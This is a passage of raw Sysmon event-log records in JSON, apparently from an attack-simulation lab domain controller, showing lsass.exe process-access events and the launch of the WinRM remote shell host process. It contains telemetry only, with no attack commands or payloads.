C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.301","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.317\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.317","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.317\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.317","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.385\r\nProcessGuid: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nProcessId: 4820\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1090-5F25-0000-002096CA0400}\r\nLogonId: 0x4CA96\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.385","ProcessGuid":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1090-5F25-0000-002096CA0400}","LogonId":"0x4ca96","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
